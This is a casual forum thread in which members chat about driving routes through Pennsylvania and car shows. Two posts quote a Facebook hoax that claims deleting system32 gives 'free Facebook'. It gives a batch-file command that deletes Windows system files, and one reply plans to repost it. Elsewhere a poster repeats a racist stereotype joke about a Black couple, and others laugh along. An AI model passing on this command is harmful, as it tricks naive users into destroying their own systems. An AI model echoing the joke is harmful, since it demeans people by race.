This is a sticky topic.
X
X

• Filter
  • Time
  • Show
Clear All

• Originally posted by Kielan View Post
    Which way you going out? If you're headed through central PA, it would be cool to see you one last time.
    Im taking 90 through NY to Chicago to stop at FMU. Ive driven through PA on either 80 or 70 4 times I think. They were all awful lol
    Website | Facebook | Instagram @Broadway_Static

Comment

• Originally posted by Average_Jerk View Post
      Im taking 90 through NY to Chicago to stop at FMU. Ive driven through PA on either 80 or 70 4 times I think. They were all awful lol
      80 is god awful and I don't blame you at all for avoiding it like the plague. Have a safe trip man.
      - Kielan (Key-lin)

Comment

• I just had to stop myself from making a horrible racist joke on FB. I forget that some people take that shit seriously

Comment

80 is god awful and I don't blame you at all for avoiding it like the plague. Have a safe trip man.
          Thanks man. the highways in PA have been under construction since like 1374.

Comment

I just had to stop myself from making a horrible racist joke on FB. I forget that some people take that shit seriously
            What was the joke?
            Originally posted by Average_Jerk View Post
            Thanks man. the highways in PA have been under construction since like 1374.
            Out to my school they actually just finished up and the roads are perfect, after that, I have no idea, I have never had any desire to go further on 80 haha.
            - Kielan (Key-lin)

Comment

What was the joke?

Out to my school they actually just finished up and the roads are perfect, after that, I have no idea, I have never had any desire to go further on 80 haha.
              this spanish/black chick im friends with is engaged to a black dude. her FB status is something along the lines of "we want to go out to dinner tonite, where should we go"

Im sure you can imagine one of many possible hilarious replies.

Comment

this spanish/black chick im friends with is engaged to a black dude. her FB status is something along the lines of "we want to go out to dinner tonite, where should we go"

Im sure you can imagine one of many possible hilarious replies.
                FUCKING LOL, Jesus, that's just asking for it. It's a good thing you showed restraint.
                - Kielan (Key-lin)

Comment

FUCKING LOL, Jesus, that's just asking for it. It's a good thing you showed restraint.
                  at first I was like "I hear KFC is a bring your own kool-aid restaurant" then I was like. nah, that might be over the line for non-internet folk

Comment

• - Kielan (Key-lin)

Comment

some people are easily butthurt

Comment

• True story.
                        - Kielan (Key-lin)

Comment

• hahaha one of my nerd buddies just posted this on FB

For everyone worried about Facebook charing money now, I found a solution. It turns out they download a file into your computer called system32 that tracks if you pay or not. If you delete it you can use Facebook all you want and never have to pay. Heres how you do it:

Open up notepad and type in the following

"@echo off
                          del c:\\WINDOWS\system32"

Save the file as anything.bat
                          (don't forget the .bat extension and save as all files)
                          once that's done, double click it and there you go, free facebook forever

repost this so all your friends can have free Facebook too.

Comment

at first I was like "I hear KFC is a bring your own kool-aid restaurant" then I was like. nah, that might be over the line for non-internet folk
                            lol

guess I'll have to try and make it to more shows next year
                            Dude... My nissan has like a v8, man.

Comment

• Originally posted by Dudermagee View Post
                              lol

guess I'll have to try and make it to more shows next year
                              if you cant travel far and take days off from work, you should try to hit Dustoff.

Comment

hahaha one of my nerd buddies just posted this on FB

For everyone worried about Facebook charing money now, I found a solution. It turns out they download a file into your computer called system32 that tracks if you pay or not. If you delete it you can use Facebook all you want and never have to pay. Heres how you do it:

Open up notepad and type in the following

"@echo off
                                del c:\WINDOWSsystem32"

Save the file as anything.bat
                                (don't forget the .bat extension and save as all files)
                                once that's done, double click it and there you go, free facebook forever

repost this so all your friends can have free Facebook too.
                                Brb making this my status.
                                - Kielan (Key-lin)

Comment

Working...
                                X